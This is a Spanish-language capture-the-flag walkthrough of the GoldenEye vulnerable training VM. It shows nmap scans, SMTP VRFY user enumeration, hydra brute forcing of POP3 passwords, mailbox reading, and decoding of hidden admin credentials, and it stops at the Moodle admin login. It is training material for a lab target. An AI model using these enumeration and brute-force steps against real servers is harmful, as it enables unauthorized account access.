# GOLDEN EYE - Vulnerable OSCP Style Machine

*Máquina estilo OSCP, obtenida de la siguiente entrada en [Reddit](https://www.reddit.com/r/netsecstudents/comments/8gdsaw/goldeneye_new_vulnerable_oscp_style_machine/)*

-------

### Escaneo de puertos inicial

Comenzamos con un escaneo de puertos de la máquina objetivo, para comprobar que servicios tiene corriendo:

```ssh
nmap -sV 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 13:22 CEST
Nmap scan report for 192.168.56.101
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
```

Vemos que tiene abiertos los siguientes puertos:

- **25** con un servidor de correos SMTP
- **80** servicio web

### Servicio Web

Accedemos al portal web:

![Foto-PortalWeb](https://gitlab.com/NaY0/golden-eye-writeup/raw/master/images/Imagen001.png)

Para iniciar sesión debemos de accedr a la ruta */dev-home/*
Y el username podría ser **UNKNOWN**

Comprobamos el código fuente en busca de pistas y llegamos al suiguiente recurso JavaScript:

![Foto-CodigoJS](https://gitlab.com/NaY0/golden-eye-writeup/raw/master/images/Imagen002.png)

Aquí podemos ver que nos han codificado una contraseña:


> \&#73;\&#110;\&#118;\&#105;\&#110;\&#99;\&#105;\&#98;\&#108;\&#101;\&#72;\&#97;\&#99;\&#107;\&#51;\&#114;\

Que decodificada es la siguiente:

> &#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;


Ya que tenemos un servidor de correos, vamos a intentar enumerar usuarios:

```ssh
telnet 192.168.56.101 25
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
220 ubuntu GoldentEye SMTP Electronic-Mail agent
VRFY root
252 2.0.0 root
VRFY UNKNOWN
550 5.1.1 <UNKNOWN>: Recipient address rejected: User unknown in local recipient table
VRFY boris
252 2.0.0 boris
VRFY natalya
252 2.0.0 natalya

```

El usuario **boris** existe, y parece que la contraseña que previamente habíamos descrifrado es la suya. Intentamos realizar login en el portal web con este usuario y la contraseña obtenida:

![LoginOK](https://gitlab.com/NaY0/golden-eye-writeup/raw/master/images/Imagen004.png)

No fijamos en el siguiente texto que aparece en la web:
>Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port

Tenemos que escanear de nuevo la IP ya que debe de tener configurado el servidor pop3 en un puerto no común.

```ssh
nmap -sV -p- 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:06 CEST
Nmap scan report for 192.168.56.101
Host is up (0.00014s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open  ssl/pop3 Dovecot pop3d
55007/tcp open  pop3     Dovecot pop3d
```

Obtenemos 2 nuevos puertos abiertos: *55006* y *55007* y podemos confirmar que el servicio **pop3** corre en estos dos puertos.

Inspeccionamos de nuevo la web */dev-home/* y nos paramos en otro comentario:
>GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)
>
>Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system

Es decir, que hay que conseguir mandar un mail a un supervisor para conseguir ser Administrador.

Inspeccionando el código fuente nos topamos con el siguiente código comentado:

![CodigoFuente1](https://gitlab.com/NaY0/golden-eye-writeup/raw/master/images/Imagen005.png)

Así que tanto el usuario **Boris** como **Natalya** son *usuarios supervisores*.

### Fuerza bruta al servidor pop3

Intentamos autenticarnos en el servidor pop3 con estos usuario y no lo conseguimos, por lo que probamos una fuerza bruta con **hydra** con ambos usuarios.

1. boris

```ssh
hydra 192.168.56.101 pop3 -l boris -P /usr/share/wordlists/fasttrack.txt -s 55007
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-21 18:26:50
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.50 tries/min, 129 tries in 00:02h, 93 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.56.101   login: boris   password: secret1!
1 of 1 target successfully completed, 1 valid password found
```
2. natalya  

```ssh
hydra 192.168.56.101 pop3 -l natalya -P /usr/share/wordlists/fasttrack.txt -s 55007
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-21 18:27:18
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 158 to do in 00:03h, 16 active
[55007][pop3] host: 192.168.56.101   login: natalya   password: bird
1 of 1 target successfully completed, 1 valid password found
```
¡BINGO! Hemos obtenido las credenciales de ambos usuarios. Accedemos al servidor de correo de ambos a ver si obtenemos información de las bandejas de entrada.

### Bandeja de entrada de Natalya

```ssh
telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id D5EDA454B1
	for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id 17C96454B1
	for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.
QUIT
+OK Logging out.
Connection closed by foreign host.

```

Cosas importantes que podemos concretar tras leer los diferentes correos en la bandeja de entrada de Natalya:

1. Nuevas credenciales de un usuario con rol Student
	- User: xenia
	- Pass: RCP90rulez!
2. Nuevo dominio **severnaya-station.com/gnocertdir** para el cual tendremos que editar el fichero */etc/hosts*

### Bandeja de entrada de Boris

```shh
telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
LIST
+OK 4 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id D9E47454B1
	for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id C3F2B454B1
	for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id 4B9F4454B1
	for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.
QUIT
+OK Logging out.
Connection closed by foreign host.
```
Cosas importantes que podemos concretar tras leer los diferentes correos en la bandeja de entrada de Boris:

1. Ha escondido en el directorio */root* un archivo importante (posiblemente sea el **flag.txt** que queremos obtener, por lo que será Boris el usuario con el que podamos consultar este archivo).

### Servicio web severnaya-station.com/gnocertdir

Editamos el fichero */etc/hosts* añadiendo las siguientes líneas:

```
192.168.56.101	severnaya-station.com
192.168.56.101	www.severnaya-station.com
```
Ahora ya nos resuelve la siguiente URL:

http://severnaya-station.com/gnocertdir/

Es un portal MOODLE:

![PortalMoodle](https://gitlab.com/NaY0/golden-eye-writeup/raw/master/images/Imagen006.png)

Accedemos a un curso y nos pide unas credenciales. En la bandeja de entrada de Natalya obtuvimos unas credenciales de usuario, las utilizamos para acceder. Navegamos a mensajes:

![MensajesMoodle](https://gitlab.com/NaY0/golden-eye-writeup/raw/master/images/Imagen007.png)

Tenemos un nuevo posible usuario del servidor de correos: **doak**

Comprobamos que existe el usuario:

```ssh
telnet 192.168.56.101 25
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
220 ubuntu GoldentEye SMTP Electronic-Mail agent
VRFY doak
252 2.0.0 doak
QUIT
221 2.0.0 Bye
Connection closed by foreign host.
```

Volvemos a realizar una fuerza bruta con hydra para intentar obtener sus credenciales:

```ssh
hydra 192.168.56.101 pop3 -l doak -P /usr/share/wordlists/fasttrack.txt -s 55007
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-21 19:10:44
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 72.00 tries/min, 144 tries in 00:02h, 78 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.56.101   login: doak   password: goat
1 of 1 target successfully completed, 1 valid password found
```

Ya tenemos credenciales **doak:goat**

### Bandeja de entrada de Doak

```ssh
telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id 97DC24549D
	for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.
QUIT
+OK Logging out.
Connection closed by foreign host.
```

Obtenemos las credenciales de Dr.Doak para el portal MOODLE.

### Portal MOODLE -  Dr.Doak

Navegamos hasta la pestaña que indicia *"My private files"* y se observa el fichero **s3cret.txt**:

![s3cret.txt](https://gitlab.com/NaY0/golden-eye-writeup/raw/master/images/Imagen008.png)

El contenido de este fichero es el siguiente:

>007,
>I was able to capture this apps adm1n cr3ds through clear txt. 
>Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 
>Something juicy is located here: /dir007key/for-007.jpg
>Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

Accedemos a la imagen */dir007key/for-007.jpg*

![for-007.jpg](https://gitlab.com/NaY0/golden-eye-writeup/raw/master/images/Imagen009.png)

Examinamos la imagen con el comando ***strings*

```ssh
strings for-007.jpg 
JFIF
Exif
eFdpbnRlcjE5OTV4IQ==
GoldenEye
linux
For James
0231
0100
ASCII
For 007
""""""""""
             !      !!!   !!!!!!!!"""""""""""""""
$3br
%4Uc

...
```

Obtenemos lo que parece ser una texto codificado en base64:

> eFdpbnRlcjE5OTV4IQ==
>
> xWinter1995x!


Ya tenemos lo que parece ser una contraseña del usuario admin.

### Portal MOODLE - admin

Accedemos con las credenciales obtenidas **admin:xWinter1995x!**

